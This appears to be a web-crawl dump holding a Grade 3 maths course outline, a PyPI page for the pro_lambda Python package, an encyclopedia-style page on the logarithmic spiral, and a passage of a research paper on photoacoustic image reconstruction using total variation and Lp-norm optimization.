msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d2819022-3be0-4ea0-ab78-0cbaceb4b1c0>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b3b50b2-e882-4e08-8599-0120696d3245>\",\"WARC-IP-Address\":\"173.236.127.6\",\"WARC-Target-URI\":\"http://www.xpmath.com/forums/showthread.php?s=427bc4106e845b546f6349966a210beb&p=19309\",\"WARC-Payload-Digest\":\"sha1:GXMEZZAXC6U2WKZEDDNFLLZY6L7DTUQU\",\"WARC-Block-Digest\":\"sha1:MTFMVVK7FJA2M72YK6UP4S7P7OWIM3K6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610704792131.69_warc_CC-MAIN-20210125220722-20210126010722-00648.warc.gz\"}"}
https://donboscolms.com/subjects/mathematics-3-fourth-quarter/
[ "# Mathematics 3 Fourth Quarter\n\nCurrent Status\nNot Enrolled\nPrice\nFree\nGet Started\n\nCOURSE OUTLINE\n\nMATHEMATICS 3\n\nFOURTH QUARTER\n\nCourse Description: The learners demonstrate understanding and appreciation of key concepts and skills involving numbers and number sense ( whole numbers up to 10 000; ordinal numbers up to 100th; money up to\n\nPhP1 000; the four fundamental operations of whole numbers; proper and improper fractions; and similar, dissimilar, and equivalent fractions ); geometry\n\n( lines, symmetry, and tessellations );patterns and algebra ( continuous and repeating patterns and number sentences ); measurement ( conversion of time, length, mass and capacity, area of square and rectangle ); and statistics and probability ( tables, bar graph, and outcome ) as applied – using appropriate technology – In critical thinking, problem solving, reasoning, communicating, making connections, representations, and decisions in real life.\n\nI. OBJECTIVES:  At the end of the quarter, the learners should be able to:\n\nA. multiply 3 – 5 digit numbers with 1 – 2 digit numbers regrouping;\n\nB.. solves routine and non-routine problems involving multiplication\n\nwithout or with addition and subtraction of whole numbers including\n\nmoney using appropriate problem solving strategies and tools;\n\nC. creates problems involving multiplication or with addition or subtraction\n\nof whole numbers including money;\n\nD. visualizes division of numbers up to 100 by 6,7,8,and 9 (multiplication\n\ntable of 6, 7, 8, and 9);\n\nE. divides 2- to 3-digit numbers by 1- to 2- digit numbers without and with\n\nRemainder;\n\nF. divides 2-3 digit numbers by 10 and 100 without or with remainder;\n\nG.  solves routine and non-routine problems involving division of 2- to\n\n4 – digit numbers by 1- to 2-digit numbers without  or with any of the\n\nother operations of whole numbers including money using appropriate\n\nproblem solving strategies and tools;\n\nH. creates problems involving division or with any of the other operations\n\nof whole numbers including money;\n\nI . identifies odd and even numbers;\n\nJ. visualizes and represents fractions that are equal to one and greater\n\nthan one;\n\nK. reads and writes fractions that are equal to one and greater than one in\n\nsymbols and in words;\n\nL. represents fractions using regions, sets, and the number line;\n\nM. visualizes and represents dissimilar fractions;\n\nN. visualizes, represents, and compares dissimilar fractions;\n\nO. visualizes, represents, and arranges dissimilar fractions in increasing\n\nor decreasing order;\n\nP. visualizes and generates equivalent fractions;\n\nQ. . recognizes and draws a point, line, line segment and ray;\n\nR. recognizes and draws parallel, intersecting and perpendicular lines;\n\nS. visualizes, identifies and draws congruent line segments;\n\nT. identifies and visualizes symmetry in the environment and in design;\n\nU. . tessellates the plane using triangles, squares and other shapes that\n\ncan tessellate;\n\nV. determines the missing term/s in a given combination of continuous\n\nand repeating pattern; and\n\nW. finds the missing value in a number sentence involving multiplication\n\nor division of whole numbers.\n\nII. Content\n\nA. Multiplication of Whole Numbers\n\n1. Multiplying mentally 2 –5 digit by  1- 2digit numbers multiplier with regrouping\n\n2. Creating and solving problems involving multiplication or with addition or\n\nsubtraction\n\n3. Creating and solving problems involving multiplication or with addition or\n\nsubtraction\n\n4. Creating and solving problems involving multiplication or with addition or\n\nsubtraction\n\nB. Division of Whole Numbers\n\n1. Basic division facts\n\n2. Dividing 2- to 3-digit numbers by 1-to 2-digit numbers\n\n3. Dividing 2-to 3-digit numbers by 1-to 2 –digit numbers\n\n4. Dividing 2-to 3- digit numbers by 10 and 100\n\n5. Estimating the quotient of 2- to 3-digit numbers by 1-to 2-digit numbers\n\n6. Dividing mentally 2-digit numbers by 1-digit numbers without remainder\n\n7. Creating and solving problems involving division\n\nC. Fractions\n\n1. Recognizing Fractions Equal To One And Greater Than One\n\n2. Reading And Writing\n\n3. Fractions in Sets, Regions And Number Line\n\nD. Tessellation\n\n1.Tessellating a plane using shapes that can tessellate\n\nF.. Patterns\n\n1. Finding the missing term/s in a given combination of continuous and repeating\n\npattern\n\n2. Finding the missing value in a number sentence involving multiplication or\n\ndivision of whole numbers\n\nIII. Criteria for Evaluation\n\nA. Written Works …………………………………………….. 40%\n\nB. Performance Tasks ………………………………………. 40%\n\nC. Quarterly Assessment …………………………………… 20%\n\nTotal ……………………………………………………….      100%\n\nMrs. Annie Marie C. Dela Peňa                 Signatures:                   _                   _\n\nTeacher                                                                       Father        Mother\n\n## Subject Content\n\nLesson Content\nLesson Content\n0% Complete 0/1 Steps\nLesson Content\n0% Complete 0/1 Steps\nLesson Content\n0% Complete 0/1 Steps\nScroll to Top" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8336155,"math_prob":0.95701545,"size":4521,"snap":"2021-04-2021-17","text_gpt3_token_len":1032,"char_repetition_ratio":0.17954394,"word_repetition_ratio":0.1734694,"special_character_ratio":0.22893165,"punctuation_ratio":0.16019417,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99358493,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-14T16:44:07Z\",\"WARC-Record-ID\":\"<urn:uuid:a5058c11-ebb4-47ea-af4d-50b4e00966e9>\",\"Content-Length\":\"89453\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:091d9c2c-3346-4a25-a5c7-c293cc8e23cb>\",\"WARC-Concurrent-To\":\"<urn:uuid:b2cd5e85-be8c-4967-8890-a6b452c2a19d>\",\"WARC-IP-Address\":\"213.190.4.94\",\"WARC-Target-URI\":\"https://donboscolms.com/subjects/mathematics-3-fourth-quarter/\",\"WARC-Payload-Digest\":\"sha1:S7IYEVRWZTASCDHVGCYZH7RS2DI6ZLIJ\",\"WARC-Block-Digest\":\"sha1:ZGFKB7V3LTMGFAZT7QP3ZQJZHI2M4COO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038077843.17_warc_CC-MAIN-20210414155517-20210414185517-00326.warc.gz\"}"}
https://pypi.org/project/pro-lambda/
[ "Lambda with math operators support\n\n## Install\n\n```pip3 install pro_lambda\n```\n\n## Documentation\n\nYou can find documentation here\n\n## Description\n\npro_lambda make it possible to modify your functions with standart mathematical and logical operators:\n\n```from pro_lambda import pro_lambda\n\nsome = pro_lambda(lambda : 1)\nother = some + 1\n# then we call result as if it was (lambda: 1)() + 1\nassert other() == 2\n\nsome = pro_lambda(lambda x, y: x+y)\nother = some + 1\n# here we pass some arguments\nassert other(1, 2) == 4\n\n# we can also use another function on the right side\nother = some + (lambda z, y: z - y)\nassert other(1, y = 2, z = 3) == 4\n```\n\nIt also supports async functions:\n\n```import asyncio\nfrom pro_lambda import pro_lambda\n\nasync def main():\n\nasync def _some(x):\nawait asyncio.sleep(0.3)\nreturn x\n\n_save = _some\nsome = pro_lambda(_some)\nother = some + (lambda: 1)\nassert some.is_async\nassert await other(1) == 2\n\nsome = pro_lambda(lambda : 1)\nother = some + _some\n\nassert other.is_async\nassert await other(x=1) == 2\n\nsome = pro_lambda(_some)\nother = some + _some\nassert other.is_async\nassert await other(x=1) == 2\n\nother = some == 1\n\nassert other.is_logical\nassert await other(1)\nassert not await other(2)\n\nasyncio.run(main())\n```\n\n## Project details\n\nThis version", null, "0.3.5", null, "0.3.4", null, "0.3.3", null, "0.3.2", null, "0.3.0", null, "0.1.11", null, "0.1.9", null, "0.1.8", null, "0.1.7", null, "0.1.6\n\nUploaded `source`" ]
[ null, "https://pypi.org/static/images/blue-cube.e6165d35.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null, "https://pypi.org/static/images/white-cube.8c3a6fe9.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68134564,"math_prob":0.9917848,"size":1466,"snap":"2022-05-2022-21","text_gpt3_token_len":378,"char_repetition_ratio":0.21545827,"word_repetition_ratio":0.16170213,"special_character_ratio":0.28308323,"punctuation_ratio":0.11363637,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98126423,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-29T12:41:53Z\",\"WARC-Record-ID\":\"<urn:uuid:37667520-3c82-495f-a9c8-cb4c82471560>\",\"Content-Length\":\"58291\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:98d674e6-6a72-44aa-9951-8c4bc37f32d7>\",\"WARC-Concurrent-To\":\"<urn:uuid:0d934468-52ba-44cf-beee-2f4c510ae8fa>\",\"WARC-IP-Address\":\"151.101.64.223\",\"WARC-Target-URI\":\"https://pypi.org/project/pro-lambda/\",\"WARC-Payload-Digest\":\"sha1:ZS4ODOM6ACTDIVM6NFQZA6ZEECX233S3\",\"WARC-Block-Digest\":\"sha1:UT3MM2CUUDOQKAS3RBJS6JVBXERT7IPQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662644142.66_warc_CC-MAIN-20220529103854-20220529133854-00715.warc.gz\"}"}
https://www.statisticshowto.com/equiangular-spiral/
[ "# Equiangular Spiral, Spira Mirabilis (Logarithmic Spiral)\n\nThe equiangular spiral (also called the Bernoulli spiral, logarithmic spiral, logistique, or Spira Mirabilis) is a family of spirals defined as a monotonic curve that cuts all radii vectors at a constant angle . In other words, the spiral forms a constant angle between a line drawn from the origin to any point on the curve and the tangent line at that point . It is this fact — equal angles — that gives the curve its name.\n\nThe curve is also sometimes called the geometrical spiral, because a radius’s angle increases in geometrical progression as its polar angle increases in arithmetical progression .\n\n## Equations for the Equiangular Spiral\n\nThe equiangular spiral has polar equation r = r * kθ, where:\n\n• k = a constant > 1 or < 1,\n• θ = the angle.\n\nThe parametric equation is :\n\n• x = e (t * cot(α)) * cos(t)\n• y = e (t * cot(α)) * sin(t)\n\nThe Cartesian equation is:\nx2 + y2 = e(θ*cot(α)).\n\nVarious natural phenomena have the shape of an equiangular spiral, including chambered nautilus shells, the Milky Way galaxy, and arrangements of sunflower seeds on the sunflower.\n\n## History of the Equiangular Spiral\n\nThe first known construction of the equiangular spiral was in Durer’s 1525 book Udterweysung . The formula was discovered by Descartes . It was later studied by Jacques Bernoulli, who dubbed the spiral spira mirabilis, “the wonderful spiral.” Bernoulli was so enamored with the spiral that he has it engraved on his tomb with the phrase “Eadem mutata resurgo” (Though changed, I rise again the same.).\n\n## References\n\n Tully, D. Equiangular Spiral, Logarithmic Spiral, Bernoulli Spiral. Retrieved February 23, 2022 from: https://mse.redwoods.edu/darnold/math50c/CalcProj/Fall98/DarrenT/EquiangularSpiral.html\n Spiral. Retrieved February 23, 2022 from: https://mse.redwoods.edu/darnold/math50c/CalcProj/Sp98/GabeP/Spiral.htm\n Erbas, A. MATH 7200-Foundations of Geometry. Retrieved February 23, 2022 from: http://jwilson.coe.uga.edu/EMT668/EMAT6680.F99/Erbas/KURSATgeometrypro/golden%20spiral/logspiral-history.html\n Albrecht Dürer (1525). Underweysung der Messung, mit dem Zirckel und Richtscheyt, in Linien, Ebenen unnd gantzen corporen\n\nCITE THIS AS:\nStephanie Glen. \"Equiangular Spiral, Spira Mirabilis (Logarithmic Spiral)\" From StatisticsHowTo.com: Elementary Statistics for the rest of us! https://www.statisticshowto.com/equiangular-spiral/" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84761727,"math_prob":0.92712104,"size":2186,"snap":"2023-40-2023-50","text_gpt3_token_len":618,"char_repetition_ratio":0.11824015,"word_repetition_ratio":0.028037382,"special_character_ratio":0.25022873,"punctuation_ratio":0.15158924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9587211,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T13:26:02Z\",\"WARC-Record-ID\":\"<urn:uuid:4b6c2542-b968-4336-ab6f-6e7fe8896162>\",\"Content-Length\":\"96771\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bcd4c16d-33a7-43ec-8c5b-8f7241ee1848>\",\"WARC-Concurrent-To\":\"<urn:uuid:9e73c693-1fd2-415e-87d1-c674bf459916>\",\"WARC-IP-Address\":\"172.66.40.136\",\"WARC-Target-URI\":\"https://www.statisticshowto.com/equiangular-spiral/\",\"WARC-Payload-Digest\":\"sha1:KSF5W26REAMBQDDLM7B5IAHLQMEGGOXT\",\"WARC-Block-Digest\":\"sha1:ZY4B5LGRV3JBF6Q4DWJGFYSG5CLO25QL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510412.43_warc_CC-MAIN-20230928130936-20230928160936-00732.warc.gz\"}"}
https://biomedical-engineering-online.biomedcentral.com/articles/10.1186/1475-925X-13-117
[ "You are viewing the new article page. Let us know what you think. Return to old version\n\nResearch | Open | Published:\n\n# A photoacoustic image reconstruction method using total variation and nonconvex optimization\n\n## Abstract\n\n### Background\n\nIn photoacoustic imaging (PAI), the reduction of scanning time is a major concern for PAI in practice. A popular strategy is to reconstruct the image from the sparse-view sampling data. However, the insufficient data leads to reconstruction quality deteriorating. Therefore, it is very important to enhance the quality of the sparse-view reconstructed images.\n\n### Method\n\nIn this paper, we proposed a joint total variation and L p -norm (TV-L p ) based image reconstruction algorithm for PAI. In this algorithm, the reconstructed image is updated by calculating its total variation value and L p -norm value. Along with the iteration, an operator-splitting framework is utilized to reduce the computational cost and the Barzilai-Borwein step size selection method is adopted to obtain the faster convergence.\n\n### Results and conclusion\n\nThrough the numerical simulation, the proposed algorithm is validated and compared with other widely used PAI reconstruction algorithms. It is revealed in the simulation result that the proposed algorithm may be more accurate than the other algorithms. Moreover, the computational cost, the convergence, the robustness to noises and the tunable parameters of the algorithm are all discussed respectively. We also implement the TV-L p algorithm in the in-vitro experiments to verify its performance in practice. Through the numerical simulations and in-vitro experiments, it is demonstrated that the proposed algorithm enhances the quality of the reconstructed images with faster calculation speed and convergence.\n\n## Introduction\n\nPhotoacoustic imaging (PAI), also known as optoacoustic tomography (OAT) or thermoacoustic tomography (TAT), is a novel hybrid biomedical imaging modality which combines the strengths of both optical and ultrasound imaging . Due to its non-ionizing nature, it has been considered as a promising imaging technique and developed rapidly during the past decade. PAI reveals physiologically specific optical absorption contrast of the biological tissues, which has great potential in clinic applications such as early tumor detection [7, 8], vessel imaging [9, 10] and brain imaging .\n\nPAI is developed based on the photoacoustic effect [1, 2], which is a process describing that the imaging tissues absorb the laser energy and convert it into acoustic waves. In this paper, we focus on the computed-tomographic PAI. In this kind of imaging mode, a laser pulse is used to illuminate the imaging tissues from the top. Some of the laser energy is absorbed and converted into heat, leading to thermoelastic expansion and thus wideband ultrasonic wave emission. The generated photoacoustic signals are then detected by a scanning ultrasound transducer or a transducer array to form images. Based on these detected signals, the optical absorption deposition of the imaging tissues can be calculated by using an image reconstruction algorithm.\n\nIn PAI, the reconstruction algorithms have become the vital factor of imaging quality. The PAI reconstruction result benefits a lot from a stable, accurate and efficient algorithm. A variety of analytical image reconstruction algorithms have been developed. Reconstruction algorithms based on the inverse spherical radon transform have been proposed in both the time-domain [12, 13] and the frequency-domain [14, 15]. The filtered back-projection (FBP) algorithm proposed by Xu et al. is the most popular algorithm due to its accuracy and convenience [16, 17]. The deconvolution reconstruction algorithm proposed by Zhang et al. has specific advantage under the circumstance of limited-angle sampling and heterogeneous acoustic medium [18, 19]. Several investigations have been made to propose the algorithms in plane geometries for imaging with the linear array of transducer [20, 21]. The analytical reconstruction methods have advantage in the computational cost and implementation convenience. However, the analytical algorithms fail to keep effective when the sampling points are sparse. The ignorance of measurements noises leads to the severely quality decline in the noisy situation. Those drawbacks above limit the applications of the analytical algorithms and impair their performance. Then the iterative image reconstruction methods are proposed to overcome these shortcomings and enhance the image quality of PAI.\n\nThe iterative image reconstruction methods usually build up a model to describe the relationship between the detected photoacoustic signals and the optical absorption deposition. So they are also called the model-based algorithms. Most of them calculate the optical absorption deposition iteratively to get the final reconstructed image. With proper optimization condition setup, the model-based methods can provide a more accurate and robust image reconstruction compared to the analytical ones [22, 23]. Many methods that proved to be useful in other aspects have been adopted in PAI reconstruction as an optimization condition of the model-based methods. Some algorithms focus on the compensation of the acoustic inhomogeneous phenomenon [24, 25]. Jose et al. proposes an iterative approach that takes the speed-of-sound of subject into account. They acquire the 2D speed-of-sound distributions and use this speed-of-sound map in their reconstruction algorithm . Huang et al. develop and establish a full-wave iterative reconstruction approach in PAI to deal with the acoustic inhomogeneous and acoustic attenuation problem . The compressed sensing has been involved in PAI reconstruction aiming to reduce the measurements and accelerate the data acquisition [26, 27]. The model-based algorithm proposed by Rosenthal et al. recovers the image in the wavelet domain with a different strategy . Meng et al. develop a compressed sensing framework by using partially known support [29, 30]. The reported results show some improvement of image qualities. The total variation (TV) coefficient is always used to de-noise the image. Some algorithm are proposed by using the total variation minization to PAI image reconstruction . Yao et al. propose the total variation minization (TVM) with the TV coefficient involved in the finite elment method to enhance the image quality and overcome the limit-angle problem [31, 32]. An adaptive steepest-descent-projection onto convex sets (ASD-POCS) is proposed by Wang et al. with the TV utilized in the iteration . They investigate and employ the TV-based iterative image reconstruction algorithms in three-dimensional PAI. Zhang et al. utilizes the TV coefficient along with the gradient descent method in PAI reconstruction to propose the Total variation based gradient descent (TV-GD) algorithm . The TV-GD method is reported to be stable and efficient under the sparse-view circumstance for PAI reconstruction. From the discussion noted above, it can be deduced that the iterative algorithms for PAI reconstruction have advantage in reconstruction qualities and robustness to noise. Now the reduction of scanning time is the main concern of PAI. A popular strategy is to reconstruct the image from sparse-view sampling data. Also there exists photoacoustic imaging system which can image the whole area with one laser exposure. These systems usually have large amount of transducers around the imaging area. With the help of sparse-view photoacoustic imaging reconstruction method, the transducer amount can be reduced. This reduction benefits the system from two main aspects. First, it helps to manage the system complexity to a lower level. The lower complexity system is more stable and easier to maintain. Second, this reduction also means the reduction of data scale. The data scale reduction can make the acquisition process more simple and flexible. Besides these two aspects, it is also worth to mention that it reduces the cost of the whole system. All those mentioned above is very important for further clinical applications. It is very important to develop a sparse-view imaging system. In this situation, the qualities of the iterative reconstructed images have room for improvement. Take the TV-GD method for example, it is reported to be an efficient and high-quality algorithm in sparse-view situation. But the paintinglike artifacts emerge and some detail information is lost in the extremely sparse-view reconstruction.\n\nThe compressed sensing theories have been adopted in PAI reconstruction, in which the L 1-norm of the signal is minimized to obtain the reconstructed image. Recently, Chartrand reported that by replacing the L 1-norm with the L p -norm (0 < p ≤ 1), accurate reconstruction is possible with substantially fewer measurements . This nonconvex optimization setting has been successfully applied to Magnetic Resonance Imaging (MRI) image reconstruction [36, 37]. The results show that the algorithm with L p -norm can provide accurate reconstruction image with fewer measurements comparing to the L 1-norm based algorithms. To another dimension of this optimization problem, several algorithms have been proposed to get a better performance in image reconstruction through jointly minimizes the TV value and L 1-norm value [38, 39] in MRI image reconstruction.\n\nIn this paper, we present a novel algorithm to the problem of reconstructing the image from sparse-view data in PAI. The algorithm is based on the jointly minimization of total variation and nonconvex L p -norm (TV-L p ). The reconstructed image is updated by calculating its joint total variation value and L p -norm value. The operator-splitting framework is used to reduce the computational cost, and the Barzilai-Borwein step size selection method is adopted to obtain the faster convergence. Through the numerical simulation, the image reconstruction in the case of insufficient sampling data was accomplished. The reconstruction result is compared with several other algorithms including the FBP , the L 1-norm and the TV-GD method . The computational cost and the convergence of the proposed algorithm is also discussed and compared with other algorithms. The numerical simulations also cover the robustness to the noise and the tunable parameter investigation. Through the numerical simulations and in-vitro experiments, it is demonstrated that the proposed algorithm enhances the quality of the reconstructed images with the faster calculation speed and convergence. It’s worthwhile to mention that like Ref. and other iteration method, we also used a projection matrix to connect the acoustic pressure measurements with the reconstructed image. But there are some implementation differences between our method and that one. We both use an intermediate variable to simplify our equations. Ref. used the velocity potential as the intermediate variable and we used a linear integration of the initial pressure along an arc whose center is the position of the ultrasound sensor and with a certain radius ct. The Ref. used a sparsifying matrix and minimized the L 1-norm in sparsifying domain to get the reconstruction. We used the information from sparsifying domain and piecewise continuous behavior to reconstruct the image. Also, we adapted the p-norm minimization into the algorithm, so it can be a more accurate algorithm in sparse-view PAI.\n\nThe main contribution of this paper is to develop a novel algorithm for solving the problem of reconstructing the image from sparse-view data in PAI. Our contributions are threefold. First, we include the nonconvex optimization into the PAI reconstruction. This nonconvex optimization setting can provide more stable and accurate result under the sparse-view situation. Second, we combine the nonconvex optimization with TV minimization. The combined method is able to reconstruct more detailed image with sharp edge. Finally, we implement the Barzilai-Borwein method accelerates the reconstruction speed and improves the convergence considerably.\n\nThis paper is organized as follows. ‘Theory and method’ describes the theory of the proposed algorithm. The numerical simulation is introduced in ‘Simulation’. The in-vitro experimental results are shown in ‘In-vitro experiments’. The conclusions of this work are drawn in ‘Conclusion’.\n\n## Theory and method\n\n### Photoacoustic theory\n\nIn this paper, the two-dimensional PAI is concerned in the simulations and experiments. In 2D PAI, a laser pulse is used to illuminate the imaging tissues from the top. Due to the photoacoustic, the illumination creates an initial acoustical pressure field. The initial acoustical pressure field propagates as ultrasound waves, which can be detected by ultrasound transducers. Based on the physical principle of the photoacoustic effect, assuming that the illumination is spatially uniform, the relationship between the acoustical pressure measurements and the initial pressure rise distribution can be derived as :\n\n$∇ 2 p r → , t - 1 c 2 ∂ 2 p r → , t ∂ t 2 =- μ C p u r → ⋅ ∂ I t ∂ t$\n(1)\n\nwhere $p r → , t$ is the acoustic pressure measurements at the position r and the time t, c is the sound speed, C p is the specific heat, μ is the isobaric expansion coefficient, I(t) is the temporal profile of the laser pulse and $u r →$ is the initial pressure rise distribution. In our study and many photoacoustic tomography studies, we employ a laser pulse with a very short duration. Its duration is nano seconds. So here we made an approximation to treat the I(t) as a Dirac-delta function.\n\nIn order to recover initial data for the wave equation, several inversion formulas have been established to solve this as a filtered back-projection problem [12, 40]. By using the Green’s function to solve equation (1), the acoustic pressure measurements can be deduced as:\n\n$p r → 0 , t = μ 4 π C p ∂ ∂ t ∯ r → - r → 0 = ct u r → t d 2 r →$\n(2)\n\nwhere $r → 0$ is the position of the ultrasound transducer.\n\nIn PAI experiments, an ultrasound transducer is used to receive the acoustic pressure measurements at different positions, and the image reconstruction is regarded as an inverse problem to obtain the initial pressure rise distribution. In the iteration of the image reconstruction, a projection matrix A is typically established to connect the acoustic pressure measurements with the reconstructed image. The measurements can be calculated based on the reconstructed image, and then the reconstructed image can be repeatedly corrected by minimizing the difference between the calculated measurements and the real ones. In this way, the optimization method can be used for collaboration and then the iteration reconstruction algorithm can be developed.\n\n### Compressed sensing for PAI\n\nIf the sampling data is insufficient, the projection matrix A is ill-conditioned. Thus, the matrix A does not have an exact inversion. As a result, it leads to streaking artifacts in the reconstructed image. This problem can be treated by incorporating the compressed sensing theory into PAI.\n\nWe define a new variable f as:\n\n$f r → 0 , t = 4 π C p μ ∫ 0 t p r → 0 , t d t ⋅t$\n(3)\n\nThen the equation (2) can be converted as follows:\n\n$f r → 0 , t = ∯ r ' - r 0 = ct u r → d 2 r →$\n(4)\n\nIn practical imaging, the reconstructed image and the measurements are processed discretely, and the image is reshaped into vectors for convenience. If the size of the reconstructed image $u r →$ is X pixels × Y pixels, then the total pixel number of the reconstructed image $u r →$ is N (N = XY). After vectorization, the reconstructed image $u r →$ becomes a vector u with the length of N. If the total number of the detection points is Q, the length of measurement in each detection point is M, the equation (4) can be expressed as:\n\n$f i = A i T ⋅u i = 1 , 2 , ⋯ , Q$\n(5)\n\nwhere f i is the integration of the $u r →$ along the arc that is centered in i th detection point and with a radius of ct, A i is the projection matrix of the i th detection point, T is the transpose operation of a matrix. The calculation of the projection matrix is as follows:\n\n$A i j =max 1 - d ⋅ d x c ⋅ d t - j , 0 1 ≤ j ≤ M$\n(6)\n1. (a)\n\nCalculate an matrix A i (j) as:\n\nwhere $d= m - m i 2 + n - n i 2$ , (m, n) is the position of the j th point in the reconstructed image,(m i , n i ) is the position of the i th detection point,dx is the actual length between the two pixels in the reconstructed image,dt is the discretized time step and M is the total sampling points at one detection point.\n\n$A= A 1 T A 2 T ⋮ A Q T$\n(7)\n1. (b)\n\nVectorize the matrix A i (j) as the j th column vector in projection matrix A i .\n\n2. (c)\n\nRepeat the calculation M times to get the projection matrix A i .\n\n3. (d)\n\nRepeat step(a) to step(c) Q times to get the projection matrix in the different sampling positions (A 1,A 2,…,A Q ). Then write the projection matrixes in the forms as follows:\n\nThe equation (6) can be expressed as:\n\n$f=A⋅u$\n(8)\n\nwhere the sizes of f, A and u are MQ pixels × 1 pixel, MQ pixels × N pixels and N pixels × 1 pixel respectively.\n\nTo reconstruct the photoacoustic image from incomplete measurements by using the compressed sensing theory, we can solve an optimization problem as follows:\n\n$min u Ψ T u 1 + 1 2 A u - f 2 2$\n(9)\n\nwhere Ψ is a sparse transform matrix,| |1 and | |2 are the L 1-norm and L2-norm respectively. By projecting the image onto an appropriate basis set, we can get a sparse representation of the original image. In this domain, most coefficients of the image are small, and a few large coefficients capture most information of the signal. In this way, we can recover a much more accurate image from those undersampled measurements.\n\nIn practical applications of PAI, the reconstructed images often show piecewise continuous behavior. The images like this always have small total variation (TV) values, which is defined as follows:\n\n$TV u = ∫ D u = ∑ i = 1 N D i u 2 i=1,2…N$\n(10)\n\nwhere D i is a matrix with the size of 2 pixels × N pixels that has two nonzero entries in each row to calculate the finite difference of u at the i th pixel. D is a matrix with the size of 2N pixels × N pixels, and D = (DX;DY),DX and DY are the horizontal and vertical global finite difference matrixes respectively.\n\nIt is reported that the TV based reconstruction algorithm can recover the image accurately from sparse sampling data . Using TV values to reconstruct the image can be expressed mathematically as:\n\n$min u TV u + 1 2 A u - f 2 2$\n(11)\n\nHowever, the TV minimization still has some limitations that impair its performance. The optimization of the TV value encourages the recovery of images with sparse gradients, thus resulting in the paintinglike staircase artifacts in the reconstructed images.\n\nRecently, some research find out that the nonconvex optimization can reconstruct an accurate image with fewer measurements by replacing the L 1-norm with the L p -norm (0 < p ≤ 1). Aiming to enhance the reconstruction quality and overcome the problem of TV based algorithm, we joint the L p -norm with TV values to establish a new optimization which can be defined by:\n\n$min u α ⋅ TV u + β Ψ T u p p + 1 2 A u - f 2 2 0\n(12)\n\nwhere α and β are parameters corresponding to the weights of the TV value and L p -norm value , | | p is the L p norm in this optimization problem respectively.\n\nTherefore, we can obtain the reconstructed image by solving this new optimization problem in equation (12).\n\n### PAI reconstruction algorithm\n\nIn this part, we solve the optimization problem in equation (12) to establish a novel photoacoustic image reconstruction algorithm by using the total variation and nonconvex optimization.\n\nWe define the finite difference approximations to partial derivatives of u at the i th pixel along the coordinate as variable ω i  = D i u, the i th pixel’s sparse coefficient as variable z i  = Ψ i Tu, where Ψ i is the sparse transform matrix of the i th pixel. The equation (12) can be deduced as:\n\n$min u , z , ω α ∑ i ω i 2 + β ∑ i z i p p + ρ 2 A ⋅ u - f 2 2 i=1,2…N$\n(13)\n\nwhere ρ is the parameter corresponding to the weight of the constraint condition in this optimization problem.\n\nWe form the augemented Lagrangian defined by\n\n$L(ω,z,u; b k ,c ) k =α ∑ i ω i 2 + ρ 2 ω i - D i u k - b i k 2 2 + β ∑ i z i p p + ρ 2 z i - Ψ i T u k - c i k 1 2 + 1 2 A ⋅ u - f 2 2$\n(14)\n\nwhere b i k is the TV step parameter in k th iteration, c i k is the L p -norm step parameter in k th iteration, uk is the vectorized image reconstruction in k th iteration.\n\nThis problem can be solved by\n\n$ω k + 1 , z k + 1 , u k + 1 = min ω , z , u L ( ω , z , u ; b k , c k ) , b i k + 1 = b i k - ω i k + 1 - D i u k + 1 , c i k + 1 = c i k - z i k + 1 - Ψ i T u k ,$\n(15)\n\nwhere ωk+1 is the finite difference approximations to partial derivatives of u in (k + 1)th iteration, zk+1 is the sparse coefficient in (k + 1)th iteration, uk+1 is the vectorized image reconstruction in (k + 1)th iteration, z i k+1 is the sparse coefficient of the i th pixel in (k + 1)th iteration, ω i k+1 is the finite difference approximations to partial derivatives of u at the i th pixel along the coordinate in (k + 1)th iteration; b i k+1 is the TV step parameter in (k + 1)th iteration, c i k+1 is the L p -norm step parameter in (k + 1)th iteration.\n\nBy using the standard augmented Lagrangian method, the optimization problem in (15) can be deduced as\n\n(16)\n\nwhere ωk is the finite difference approximations to partial derivatives of u in k th iteration, zk is the sparse coefficient in k th iteration, uk is the vectorized image reconstruction in k th iteration; δ k is the 